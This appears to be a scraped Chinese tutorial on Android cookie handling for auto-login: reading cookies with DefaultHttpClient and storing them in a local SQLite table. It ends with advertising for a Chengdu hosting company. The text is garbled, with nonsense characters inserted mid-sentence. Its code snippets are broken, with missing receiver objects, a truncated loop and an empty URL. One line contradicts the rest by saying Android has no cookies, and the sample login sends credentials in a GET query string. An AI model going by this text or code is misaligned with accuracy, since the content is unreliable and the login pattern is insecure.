while (iter.hasNext()) {

Map.Entry entry = (Map.Entry) iter.next();

String key = entry.getKey().toString();

String val = entry.getValue().toString();

.append(key);

.append(“=”);

.append(val);

.append(“;”);

}

request.addHeader(“cookie”, .toString());

}

　　做了一個android網(wǎng)絡應用，要培蔽睜求用自己實現(xiàn)的webview去訪問web網(wǎng)站，并且在遠程登錄成功之后把cookie寫入到手機，保留用作以后的自動登錄。找了好多資料。發(fā)覺讀取cookies倒還用的很普遍，可是通過程序寫cookie卻沒有太多資料。

　　先來看一下如何讀取cookie吧：

　　try

{

DefaultHttpClient httpclient = new DefaultHttpClient();

HttpGet httpget = new HttpGet(“

“配歲);

HttpResponse response = httpclient.execute(httpget);

HttpEntity entity = response.getEntity();

List cookies = httpclient.getCookieStore().getCookies();

if (entity != null) {

entity.consumeContent();

}

if (cookies.isEmpty()) {

Log.i(TAG, “NONE”);

} else {

for (int i = 0; i

Log.i(TAG,”- domain ” + cookies.get(i).getDomain());

Log.i(TAG,”- path ” + cookies.get(i).getPath());

Log.i(TAG,”- value ” + cookies.get(i).getValue());

Log.i(TAG,”- name ” + cookies.get(i).getName());

Log.i(TAG,”- port ” + cookies.get(i).getPorts());

Log.i(TAG,”- comment ” + cookies.get(i).getComment());

Log.i(TAG,”- commenturl” + cookies.get(i).getCommentURL());

Log.i(TAG,”- all ” + cookies.get(i).toString());

}

}

httpclient.getConnectionManager().shutdown();

}catch(Exception e){

//Todo

}finally{

//Todo

}

通過分析com.android.browser的源碼，發(fā)現(xiàn)android默認的browser增加cookie是在數(shù)據(jù)庫中增加記錄，和window不同，win是采用一個txt文本文件的形式來存儲cookie。而android是將cookie存儲在數(shù)據(jù)庫中。具體的介紹在《android cookie存儲位置》一文中有介紹。我們都知道，android每個應用程序的存儲空間都是獨立的。不管使用preference還是database存儲，都會在每個/data/data/package name/下面進行存儲（preference存儲在/data/data/package name/shared_prefs/xxxx.xml）。前面也說到cookie是存在數(shù)據(jù)庫中，那么如果采用非瀏覽器訪問網(wǎng)絡需要保留cookie的話我們就應該在database中建立cookies表，并且存入相應的cookies數(shù)據(jù)。仿照默認broswer的代碼：

　　/**聲明一些數(shù)據(jù)庫操作的常量*/

private static SQLiteDatabase mDatabase = null;

private static final String DATABASE_FILE = “webview.db”;

private static final String COOKIES_NAME_COL = “name”;

private static final String COOKIES_VALUE_COL = “value”;

private static final String COOKIES_DOMAIN_COL = “domain”;

private static final String COOKIES_PATH_COL = “path”;

private static final String COOKIES_EXPIRES_COL = “expires”;

private static final String COOKIES_SECURE_COL = “secure”;

mDatabase = LoginApiActivity.this.openOrCreateDatabase(DATABASE_FILE, 0, null);

//創(chuàng)建cookie數(shù)據(jù)庫

if (mDatabase != null) {

// cookies

mDatabase.execSQL(“CREATE TABLE IF NOT EXISTS cookies “

+ ” (_id INTEGER PRIMARY KEY, “

+ COOKIES_NAME_COL + ” TEXT, ” + COOKIES_VALUE_COL

+ ” TEXT, ” + COOKIES_DOMAIN_COL + ” TEXT, “

+ COOKIES_PATH_COL + ” TEXT, ” + COOKIES_EXPIRES_COL

+ ” INTEGER, ” + COOKIES_SECURE_COL + ” INTEGER” + “);”);

mDatabase.execSQL(“CREATE INDEX IF NOT EXISTS cookiesIndex ON “

+ “cookies” + ” (path)”);

}

}

/*寫cookie*/

public void addCookie(Cookie cookie) {

if (cookie.getDomain() == null || cookie.getPath() == null || cookie.getName() == null

|| mDatabase == null) {

return;

}

String mCookieLock = “asd”;

synchronized (mCookieLock) {

ContentValues cookieVal = new ContentValues();

cookieVal.put(COOKIES_DOMAIN_COL, cookie.getDomain());

cookieVal.put(COOKIES_PATH_COL, cookie.getPath());

cookieVal.put(COOKIES_NAME_COL, cookie.getName());

cookieVal.put(COOKIES_VALUE_COL, cookie.getValue());

mDatabase.insert(“cookies”, null, cookieVal);

}

}

cookie只是網(wǎng)頁緩存，安卓是沒有cookie的。

比如一個網(wǎng)站xxxx.com，登陸頁為坦陵xxx.com/login.jsp,登陸方式為get，也就是xxx.com/login.jsp?username=xx&password=xx。登陸成功后從此頁都取得了Json值，但是用http來獲取另一行信個頁面的Json時就是null，這就是典型的cookie問題，因為這里每一檔信輪個Json頁面都有cookie檢測。需要android請求的時候加上cookie在可以順利訪問。

緩存

cookie存入本地數(shù)據(jù)庫的介紹就聊到這里吧，感謝你花時間閱讀本站內容，更多關于cookie存入本地數(shù)據(jù)庫,實現(xiàn)網(wǎng)站記住登錄狀態(tài)：cookie存入本地數(shù)據(jù)庫,cookie里面保存的什么內容，占空間大嗎？能否清楚,cookie是什么意思？,安卓cookie，cookie是什么？cookie是什么的信息別忘了在本站進行查找喔。

成都創(chuàng)新互聯(lián)科技有限公司，是一家專注于互聯(lián)網(wǎng)、IDC服務、應用軟件開發(fā)、網(wǎng)站建設推廣的公司，為客戶提供互聯(lián)網(wǎng)基礎服務！
創(chuàng)新互聯(lián)（www.cdcxhl.com）提供簡單好用，價格厚道的香港/美國云服務器和獨立服務器。創(chuàng)新互聯(lián)——四川成都IDC機房服務器托管/機柜租用。為您精選優(yōu)質idc數(shù)據(jù)中心機房租用、服務器托管、機柜租賃、大帶寬租用，高電服務器托管，算力服務器租用，可選線路電信、移動、聯(lián)通機房等。

本文題目：實現(xiàn)網(wǎng)站記住登錄狀態(tài)：cookie存入本地數(shù)據(jù)庫(cookie存入本地數(shù)據(jù)庫)
文章鏈接：http://uogjgqi.cn/article/cosspsi.html